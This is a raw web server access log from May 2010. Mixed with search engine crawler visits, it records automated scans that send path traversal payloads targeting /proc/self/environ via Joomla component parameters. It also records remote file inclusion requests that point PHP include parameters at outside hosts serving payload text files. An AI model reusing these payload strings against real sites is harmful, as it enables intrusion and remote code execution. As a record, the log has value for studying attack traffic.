77.92.74.100 - - [23/May/2010:01:35:08 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
94.23.20.123 - - [23/May/2010:01:35:58 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.46.13.100 - - [23/May/2010:01:39:02 -0500] "GET /logs/access_log.1219104000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.131 - - [23/May/2010:01:39:33 -0500] "GET /logs/access_log.1163894400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.9.14.148 - - [23/May/2010:01:41:51 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.9.14.148 - - [23/May/2010:01:41:51 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322 "-""libwww-perl/5.822"
195.9.14.148 - - [23/May/2010:01:41:51 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 322 "-"""
195.9.14.148 - - [23/May/2010:01:41:52 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-"""
67.195.112.180 - - [23/May/2010:01:42:41 -0500] "GET /logs/access_log.1182902400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.217.229.185 - - [23/May/2010:01:43:08 -0500] "GET /Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:43:08 -0500] "GET /logs/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:43:08 -0500] "GET /logs/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:43:08 -0500] "GET /Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:43:08 -0500] "GET /logs/access_log.1271548800/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:43:08 -0500] "GET /logs/access_log.1271548800/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:43:29 -0500] "GET /Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:43:29 -0500] "GET /logs/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:43:29 -0500] "GET /logs/access_log.1271548800/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:43:50 -0500] "GET /logs/access_log.1271548800/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:43:50 -0500] "GET /logs/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:43:50 -0500] "GET /logs/access_log.1271548800/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:43:50 -0500] "GET /Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:43:50 -0500] "GET /logs/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:43:50 -0500] "GET /Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:43:53 -0500] "GET /Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:43:53 -0500] "GET /logs/access_log.1271548800/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:43:53 -0500] "GET /logs/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:04 -0500] "GET /Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:04 -0500] "GET /logs/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:04 -0500] "GET /logs/access_log.1271548800/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.44.114.154 - - [23/May/2010:01:44:05 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
209.44.114.154 - - [23/May/2010:01:44:05 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.44.114.154 - - [23/May/2010:01:44:05 -0500] "GET /logs/access_log.1271548800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:08 -0500] "GET /Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:08 -0500] "GET /logs/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:08 -0500] "GET /logs/access_log.1271548800/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:31 -0500] "GET /Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:31 -0500] "GET /logs/access_log.1271548800/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:31 -0500] "GET /logs/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:34 -0500] "GET /Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:34 -0500] "GET /logs/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
220.194.62.53 - - [23/May/2010:01:44:34 -0500] "GET /logs/access_log.1271548800/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:45:07 -0500] "GET /logs/access_log.1271548800/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:45:07 -0500] "GET /Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:45:07 -0500] "GET /logs/Gallery/displayCategory.php?basepath=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
87.250.255.243 - - [23/May/2010:01:45:30 -0500] "GET /logs/access_log.1269216000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.217.229.185 - - [23/May/2010:01:47:08 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:01:47:09 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
209.44.114.154 - - [23/May/2010:01:48:59 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
209.44.114.154 - - [23/May/2010:01:48:59 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.44.114.154 - - [23/May/2010:01:48:59 -0500] "GET /logs/access_log.1271548800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
94.23.60.216 - - [23/May/2010:01:50:07 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
94.23.60.216 - - [23/May/2010:01:50:07 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
94.23.60.216 - - [23/May/2010:01:50:07 -0500] "GET /logs/access_log.1271548800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
67.195.112.180 - - [23/May/2010:01:50:12 -0500] "GET /logs/access_log.1272672000 HTTP/1.0" 200 502112 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.60.216 - - [23/May/2010:01:51:44 -0500] "GET /logs/access_log.1271548800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 366 "-""Mozilla/5.0"
94.23.60.216 - - [23/May/2010:01:51:44 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
94.23.60.216 - - [23/May/2010:01:51:44 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:01:52:07 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:01:52:07 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
212.241.251.224 - - [23/May/2010:01:52:10 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
212.241.251.224 - - [23/May/2010:01:52:10 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.180 - - [23/May/2010:01:52:17 -0500] "GET /logs/access_log.1199059200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [23/May/2010:01:54:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
78.110.50.119 - - [23/May/2010:01:56:02 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
78.110.50.119 - - [23/May/2010:01:56:02 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
78.110.50.119 - - [23/May/2010:01:56:02 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
78.110.50.119 - - [23/May/2010:01:56:02 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.46.195.242 - - [23/May/2010:01:56:03 -0500] "GET /logs/access_log.1210291200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.92.74.100 - - [23/May/2010:01:57:26 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
77.92.74.100 - - [23/May/2010:01:57:26 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
77.92.74.100 - - [23/May/2010:01:57:26 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.129.119.43 - - [23/May/2010:01:57:28 -0500] "GET /artwork/furniture-motto-line.htm HTTP/1.1" 200 2441 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
124.217.229.185 - - [23/May/2010:01:57:45 -0500] "GET /logs/access_log.1270512000/language/lang_english/lang_activity.php?phpbb_root_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:57:45 -0500] "GET /language/lang_english/lang_activity.php?phpbb_root_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:57:45 -0500] "GET /logs/access_log.1264118400/language/lang_english/lang_activity.php?phpbb_root_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:57:45 -0500] "GET /logs/language/lang_english/lang_activity.php?phpbb_root_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:57:49 -0500] "GET /logs/language/lang_english/lang_activity.php?phpbb_root_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:57:49 -0500] "GET /language/lang_english/lang_activity.php?phpbb_root_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:57:52 -0500] "GET /logs/access_log.1264118400/language/lang_english/lang_activity.php?phpbb_root_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:58:03 -0500] "GET /logs/language/lang_english/lang_activity.php?phpbb_root_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:01:58:04 -0500] "GET /logs/access_log.1270512000/language/lang_english/lang_activity.php?phpbb_root_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
94.23.20.123 - - [23/May/2010:02:00:22 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:02:00:22 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:02:00:22 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
124.217.229.185 - - [23/May/2010:02:03:22 -0500] "GET /logs/access_log.1264118400/language/lang_english/lang_activity.php?phpbb_root_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.126.254.162 - - [23/May/2010:02:03:36 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.76"
209.126.254.162 - - [23/May/2010:02:03:37 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.76"
66.96.218.85 - - [23/May/2010:02:03:41 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
66.96.218.85 - - [23/May/2010:02:03:41 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
124.217.229.185 - - [23/May/2010:02:03:57 -0500] "GET /logs/access_log.1270512000/language/lang_english/lang_activity.php?phpbb_root_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
77.92.74.100 - - [23/May/2010:02:06:23 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
77.92.74.100 - - [23/May/2010:02:06:23 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
67.195.112.180 - - [23/May/2010:02:07:03 -0500] "GET /logs/access_log.1224028800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.20.123 - - [23/May/2010:02:09:52 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:02:09:52 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:02:09:56 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:02:09:57 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:02:10:04 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:02:10:04 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
125.162.206.179 - - [23/May/2010:02:10:06 -0500] "GET /logs/access_log.1230508800/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://didilz.fileave.com/backup1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
125.162.206.179 - - [23/May/2010:02:10:06 -0500] "GET /joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://didilz.fileave.com/backup1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
125.162.206.179 - - [23/May/2010:02:10:07 -0500] "GET /logs/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://didilz.fileave.com/backup1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
125.162.206.179 - - [23/May/2010:02:11:06 -0500] "GET /logs/access_log.1221868800/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=http://didilz.fileave.com/backup1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
67.195.112.180 - - [23/May/2010:02:12:01 -0500] "GET /logs/access_log.1208649600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.100.228.237 - - [23/May/2010:02:15:25 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [23/May/2010:02:15:26 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.195.112.180 - - [23/May/2010:02:26:08 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3957 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.7.185.19 - - [23/May/2010:02:26:39 -0500] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
216.7.185.19 - - [23/May/2010:02:26:39 -0500] "GET //micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
207.46.199.49 - - [23/May/2010:02:27:03 -0500] "GET /logs/access_log.1259452800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.7.185.19 - - [23/May/2010:02:27:03 -0500] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
216.7.185.19 - - [23/May/2010:02:27:03 -0500] "GET //micro_cms_files/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
